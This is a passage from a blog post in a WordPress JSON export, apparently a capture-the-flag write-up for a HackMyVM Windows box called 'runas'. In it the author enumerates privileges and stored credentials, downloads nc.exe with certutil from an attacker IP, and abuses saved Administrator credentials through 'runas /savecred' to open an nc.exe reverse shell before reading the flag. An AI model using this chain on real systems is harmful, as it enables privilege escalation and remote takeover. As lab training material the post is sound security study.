\/><\/div><\/p>\n<blockquote>\n<p><a href=\"https:\/\/www.cnblogs.com\/kqdssheng\/p\/18751119\">https:\/\/www.cnblogs.com\/kqdssheng\/p\/18751119<\/a><\/p>\n<\/blockquote>\n<p>\u4e5f\u53ef\u4ee5\u4f7f\u7528<code>winPEAS<\/code>\u8fdb\u884c\u679a\u4e3e\uff01\u53c8\u5b66\u5230\u4e86\u4e00\u70b9\uff01\u9700\u8981\u4f20\u4e00\u4e2anc\u4e0a\u53bb\uff1a<\/p>\n<pre><code class=\"language-bash\">meterpreter &gt; shell\nProcess 2512 created.\nChannel 5 created.\nMicrosoft Windows [S\ufffdr\ufffdm 6.1.7601]\nTelif Hakk\ufffd (c) 2009 Microsoft Corporation. T\ufffdm haklar\ufffd sakl\ufffdd\ufffdr.\n\nC:\\Users\\runas&gt;whoami \/priv\nwhoami \/priv\n\nAYRICALIK B\ufffdLG\ufffdLER\ufffd\n----------------------\n\nAyr\ufffdcal\ufffdk Ad\ufffd                 A\ufffd\ufffdklama                           Durum\n============================= ================================== =====\nSeShutdownPrivilege           Sistemi kapat                      Etkin\nSeChangeNotifyPrivilege       \ufffdapraz ge\ufffdi\ufffd denetimini atla       Etkin\nSeUndockPrivilege             Bilgisayar\ufffd takma biriminden \ufffd\ufffdkar Etkin\nSeIncreaseWorkingSetPrivilege \ufffd\ufffdlem \ufffdal\ufffd\ufffdma k\ufffdmesini art\ufffdr       Etkin\nSeTimeZonePrivilege           Saat dilimini de\ufffdi\ufffdtir             Etkin\n\nC:\\Users\\runas&gt;cmdkey \/list\ncmdkey \/list\n\nDepolanan ge\ufffderli kimlik bilgileri:\n\n    Hedef: Domain:interactive=RUNAS-PC\\Administrator\n    T\ufffdr: Etki Alan\ufffd Parolas\ufffd \n    Kullan\ufffdc\ufffd: RUNAS-PC\\Administrator\n\nC:\\Users\\runas&gt;certutil -urlcache -split -f http:\/\/192.168.10.103:8888\/nc.exe\ncertutil -urlcache -split -f http:\/\/192.168.10.103:8888\/nc.exe\n****  \ufffdevrimi\ufffdi  ****\n  0000  ...\n  96d8\nCertUtil: -URLCache komutu ba\ufffdar\ufffdyla tamamland\ufffd.\n\nC:\\Users\\runas&gt;dir\ndir\n C s\ufffdr\ufffdc\ufffds\ufffdndeki birimin etiketi yok.\n Birim Seri Numaras\ufffd: 542C-C630\n\n C:\\Users\\runas dizini\n\n08.06.2025  05:37    &lt;DIR&gt;          .\n08.06.2025  05:37    &lt;DIR&gt;          ..\n06.10.2024  21:38    &lt;DIR&gt;          Contacts\n09.10.2024  18:24    &lt;DIR&gt;          Desktop\n06.10.2024  21:38    &lt;DIR&gt;          Documents\n06.10.2024  21:38    &lt;DIR&gt;          Downloads\n06.10.2024  21:38    &lt;DIR&gt;          Favorites\n06.10.2024  21:38    &lt;DIR&gt;          Links\n06.10.2024  21:38    &lt;DIR&gt;          Music\n08.06.2025  05:37            38.616 nc.exe\n06.10.2024  21:38    &lt;DIR&gt;          Pictures\n06.10.2024  21:38    &lt;DIR&gt;          Saved Games\n06.10.2024  21:38    &lt;DIR&gt;          Searches\n08.06.2025  05:02            73.802 shell.exe\n06.10.2024  21:38    &lt;DIR&gt;          Videos\n               2 Dosya          112.418 bayt\n              13 Dizin   21.674.962.944 bayt bo\ufffd\n\nC:\\Users\\runas&gt;runas \/env \/noprofile \/savecred \/user:Administrator &quot;C:\\Users\\runas\\nc.exe 192.168.10.103 1234 -e cmd.exe&quot;\nrunas \/env \/noprofile \/savecred \/user:Administrator &quot;C:\\Users\\runas\\nc.exe 192.168.10.103 1234 -e cmd.exe&quot;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041337.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041337.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608104017752\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff\u5230flag\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-bash\">C:\\Users\\runas&gt;cd ..\ncd ..\n\nC:\\Users&gt;dir\ndir\n C s\ufffdr\ufffdc\ufffds\ufffdndeki birimin etiketi yok.\n Birim Seri Numaras\ufffd: 542C-C630\n\n C:\\Users dizini\n\n06.10.2024  22:21    &lt;DIR&gt;          .\n06.10.2024  22:21    &lt;DIR&gt;          ..\n06.10.2024  21:44    &lt;DIR&gt;          Administrator\n06.10.2024  22:21    &lt;DIR&gt;          Classic .NET AppPool\n06.10.2024  22:05    &lt;DIR&gt;          DefaultAppPool\n12.04.2011  18:08    &lt;DIR&gt;          Public\n08.06.2025  05:37    &lt;DIR&gt;          runas\n               0 Dosya                0 bayt\n               7 Dizin   21.674.926.080 bayt bo\ufffd\n\nC:\\Users&gt;cd Administrator\ncd Administrator\n\nC:\\Users\\Administrator&gt;cd Desktop\ncd Desktop\n\nC:\\Users\\Administrator\\Desktop&gt;dir\ndir\n C s\ufffdr\ufffdc\ufffds\ufffdndeki birimin etiketi yok.\n Birim Seri Numaras\ufffd: 542C-C630\n\n C:\\Users\\Administrator\\Desktop dizini\n\n08.10.2024  18:12    &lt;DIR&gt;          .\n08.10.2024  18:12    &lt;DIR&gt;          ..\n08.10.2024  17:09                24 root.txt\n               1 Dosya               24 bayt\n               2 Dizin   21.674.926.080 bayt bo\ufffd\n\nC:\\Users\\Administrator\\Desktop&gt;type root.txt\ntype root.txt\nHMV{Username_Is_My_Hint}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>runas \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas] \u2514\u2500$ rusts [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-839","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/839","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=839"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/839\/revisions"}],"predecessor-version":[{"id":840,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/839\/revisions\/840"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=839"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=839"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=839"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}